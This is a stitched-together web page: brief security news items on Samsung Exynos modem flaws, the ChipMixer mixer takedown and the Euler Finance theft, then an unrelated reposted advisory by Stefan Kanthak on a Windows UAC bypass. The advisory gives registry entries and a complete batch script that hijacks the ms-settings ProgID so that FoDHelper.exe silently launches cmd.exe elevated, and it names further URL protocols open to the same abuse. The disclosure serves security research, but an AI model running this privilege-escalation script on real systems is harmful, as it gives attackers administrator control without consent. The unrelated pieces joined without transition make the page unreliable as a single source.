Google’s Project Zero, its security research team devoted to finding unknown vulnerabilities in widely used tech products, warned Thursday that it had discovered severe hackable flaws in Samsung chips used in dozens of Android devices. In total, the researchers found 18 distinct vulnerabilities in Samsung’s Exynos modems for smartphones, but they say that four of them are particularly critical and would allow a hacker to “remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim’s phone number.” Project Zero only rarely publishes information on unpatched vulnerabilities. But it says that it gave Samsung 90 days to fix the flaws, and it hasn’t yet. A bit of public shaming, perhaps, might spur Samsung to move faster to protect Google’s users from an insidious form of attack.

Since 2017, the cryptocurrency “mixer” service ChipMixer quietly grew into a powerhouse of cryptocurrency money laundering, taking in users’ coins, mixing them with others and then sending them back to obscure the money’s trail across blockchains. In the process, the Department of Justice says it laundered $3 billion worth of criminal funds, including ransomware payments, North Korean hackers’ stolen loot, and even profits from the sale of child sexual exploitation materials. Now, in a bust carried out by multiple European law enforcement agencies and coordinated by Europol as well as the FBI and DHS, ChipMixer has been taken offline and its infrastructure seized. The site’s alleged creator, 49-year-old Vietnamese national Minh Quốc Nguyễn, remains out of reach: He’s been charged with money laundering only in absentia. 

But the most intriguing result of the case may have more to do with the meltdown of the now notorious cryptocurrency exchange FTX: A portion of FTX’s funds that were stolen in the midst of its bankruptcy proceedings in November were funneled into ChipMixer. Seizing the servers of that mixing service may well foil the FTX thieves’ attempt to evade tracing and help solve one of the central mysteries of that high-profile heist.

Only in the cryptocurrency world, where thefts of more than half a billion dollars now occur multiple times a year, does the stealing of $200 million merit the lowest spot on a news roundup. Early this week, the distributed trading protocol Euler Finance lost nearly $200 million in cryptocurrency to hackers who found a vulnerability in its code. At first, Euler, the company behind that protocol, offered to let the hackers keep $20 million if they returned the rest of the funds. But after that offer was ignored—in fact, the hackers have sent the funds to the Tornado Cash mixing service in the hopes of covering their tracks—the firm has announced a $1 million bounty on the hackers’ heads.

Security News This Week: Ring Is in a Standoff With Hackers

This write up is an overview of how Microsoft's attempts to manage elevated access to executables via registry entries has added over complexity that still allows for escalation.

    Hi @ll,with Windows 2000, Microsoft virtualised the [HKEY_CLASSES_ROOT] registrybranch: what was just an alias for [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]before became the overlay of [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] and[HKEY_CURRENT_USER\Software\Classes] with the latter having precedence:<https://msdn.microsoft.com/en-us/library/ms724498.aspx>Note: while [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] is writable only by      (privileged) administrators, [HKEY_CURRENT_USER\Software\Classes]      is writable by the (current) unprivileged user.With Windows Vista they introduced the "security theatre" called"User Account Control" (a far better name is "qUACkery"):<https://blogs.msdn.microsoft.com/uac/2005/12/08/user-account-control/>| User Account Protection was the preliminary name for a core security| component of Windows Vista. The component has now been officially named| User Account Control (UAC).The qUACkery sort of lobotomises administrator accounts and splits theirbrain^Waccess token: the "shell", i.e. EXPLORER.exe, and all programs runfrom it use a restricted access token without administrative privileges.For the (not so few) programs which but need administrative privileges,Microsoft introduced a "kill switch" in the application manifest:<https://msdn.microsoft.com/en-us/library/aa374191.aspx><https://msdn.microsoft.com/en-us/library/bb756929.aspx>| <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">|    <security>|       <requestedPrivileges>|          <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />|       </requestedPrivileges>|    </security>| </trustInfo>With this loop^Wwormhole, the virtualised [HKEY_CLASSES_ROOT] introducedwith Windows 2000 became but a can of worms: in STANDARD installations ofWindows, applications running with administrative privileges, i.e. anintegrity level above "Medium", now evaluate registry settings (COM CLSIDs,ProgIDs, URL protocols, ...) which are under control of the unprivilegeduser.<https://msdn.microsoft.com/en-us/library/ms724498.aspx>| If an application is run with administrator rights and User Account| Control is disabled, the COM runtime ignores per-user COM configuration| and accesses only per-machine COM configuration.<https://msdn.microsoft.com/en-us/library/bb756926.aspx>| Beginning with Windows Vista® and Windows Server® 2008, if the| integrity level of a process is higher than Medium, the COM runtime| ignores per-user COM configuration and accesses only per-machine| COM configuration. This action reduces the surface area for elevation| of privilege attacks, preventing a process with standard user privileges| from configuring a COM object with arbitrary code and having this code| called from an elevated process.OOPS: COM CLSIDs have been removed from the can of worms.But what about ProgIDs and URL protocols?<https://msdn.microsoft.com/en-us/library/cc144152.aspx>Demonstration:~~~~~~~~~~~~~~1) Start the command processor in the user account created during   Windows setup;2) Execute the "Feature on Demand" helper application FoDHelper.exe   (which requires administrative privileges, but elevates SILENTLY),   then close the "Immersive Control Panel" window it opened;3) Add the following registry entries to replace the application run   by the elevated FoDHelper.exe from "Immersive Control Panel" to   "Windows Command Processor" (or an arbitrary other one):   [HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command]   @="C:\\Windows\\System32\\Cmd.exe"   [HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer]   @="qUACkery"4) Execute FoDHelper.exe again;5) Remove the registry entries created in step 3.If you prefer a batch script:--- quackery.cmdREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\qUACkery\Shell\Open\Command" /VE /T REG_SZ /D "%COMSPEC%" /FREG.exe ADD "HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer" /VE /T REG_SZ /D "qUACkery" /FFoDHelper.exeREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\MS-Settings" /FREG.exe DELETE "HKEY_CURRENT_USER\Software\Classes\qUACkery" /F--- EOF ---OOPS: Windows Defender blocks the execution of FoDHelper.exeSpoiler: installation of another anti-virus, for example McAfee,         Bitdefender, Eset, Sophos, Avira, AVG/Avast, TrendMicro,         deactivates Windows Defender and lets FoDHelper.com run         an arbitrary application elevated, without UAC prompt.stay tuned, and far away from the eternally vulnerable crap oozing out of RedmondStefan KanthakPS: finding the applications which call the ProgIDs/URL protocols    ms-settings-airplanemode, ms-settings-bluetooth, ms-settings-cellular,    ms-settings-connectabledevices, ms-settings-displays-topology,    ms-settings-emailandaccounts, ms-settings-language, ms-settings-location,    ms-settings-lock, ms-settings-mobilehotspot, ms-settings-notifications,    ms-settings-power, ms-settings-privacy, ms-settings-proximity,    ms-settings-screenrotation, ms-settings-wifi, ms-settings-workplace    is left as an exercise to the reader.PPS: for all these URL protocols, the wise guys from Redmond added the     following registry entries to ease their exploitation:     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings]     "WarnOnOpen"=dword:00000000     ...     [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ProtocolExecute\ms-settings-workplace]     "WarnOnOpen"=dword:00000000

Tag

#wifi